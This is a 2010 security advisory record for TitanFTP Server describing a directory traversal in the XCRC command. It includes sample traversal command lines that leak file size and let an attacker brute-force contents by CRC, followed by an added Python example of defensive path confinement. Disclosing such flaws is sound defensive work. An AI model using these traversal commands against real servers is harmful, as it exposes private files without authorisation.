TitanFtp Server File Disclosure

2010-06-17T00:00:00
ID PACKETSTORM:90714
Type packetstorm
Reporter Bill Finlayson
Modified 2010-06-17T00:00:00

Description

                                        
                                            `Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure  
  
Details  
  
=============  
  
Product: TitanFTP Server  
  
Security-Risk: high  
  
Remote-Exploit: maybe, assuming anonymous ftp access  
  
Local-Exploit: yes  
  
Vendor URL: http://www.southrivertech.com/  
  
Found By: Bill Finlayson  
  
http://www.accensussecurity.com  
  
Affected: Versions 8.10.1125 and likely previous  
  
Issue: the XCRC command is susceptible to directory traversal, which allows disclosure of the contents of any file on the server
  
Details: xcrc ..//..//..//..//a.txt 1 <some huge number> discloses the file's size
  
xcrc ..//..//..//..//a.txt 1 2  
xcrc ..//..//..//..//a.txt 1 3  
...  
xcrc ..//..//..//..//a.txt 1 <filesize>  
  
When automated, this sequence allows an easy brute-force attack on the CRCs.
  
Status: Submitted to vendor 6/14/10; fixed 6/15/10
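Added example, not code from the advisory or from South River Technologies: a Python sketch of how an FTP server can confine an XCRC path argument to its virtual root (collapsing the `..//` form above) before touching the filesystem. The `XCRC <path> <start> <end>` syntax, the reply codes and the function names are assumptions.

```python
import os
import posixpath
import zlib
from typing import Optional


def confine_to_root(cwd: str, requested: str) -> Optional[str]:
    """Normalise a client-supplied FTP path; return None if it escapes the virtual root.

    FTP paths are virtual and POSIX-style whatever the host OS, so backslashes,
    doubled slashes ('..//..//') and '.' components are collapsed before the
    check so that it sees the same path the filesystem would.
    """
    virtual = requested.replace("\\", "/")
    if not virtual.startswith("/"):
        virtual = posixpath.join(cwd, virtual)       # relative to the session's CWD
    rel = posixpath.normpath(virtual.lstrip("/"))     # root-relative, '..' resolved
    if rel == ".." or rel.startswith("../"):          # climbed above '/'
        return None
    return "/" if rel == "." else "/" + rel


def xcrc(ftp_root: str, cwd: str, requested: str, start: int, end: int) -> str:
    """Hypothetical XCRC handler: CRC32 of bytes [start, end] of a confined path."""
    virtual = confine_to_root(cwd, requested)
    if virtual is None:
        return "550 Permission denied"
    root_real = os.path.realpath(ftp_root)
    real = os.path.realpath(os.path.join(root_real, *virtual.strip("/").split("/")))
    # Re-check after realpath: a symlink inside the root must not point outside it.
    if os.path.commonpath([root_real, real]) != root_real:
        return "550 Permission denied"
    if not os.path.isfile(real):
        return "550 File not found"
    if start < 0 or end < start:
        return "501 Bad byte range"
    with open(real, "rb") as fh:
        fh.seek(start)
        data = fh.read(end - start + 1)
    return f"250 {zlib.crc32(data):08X}"
```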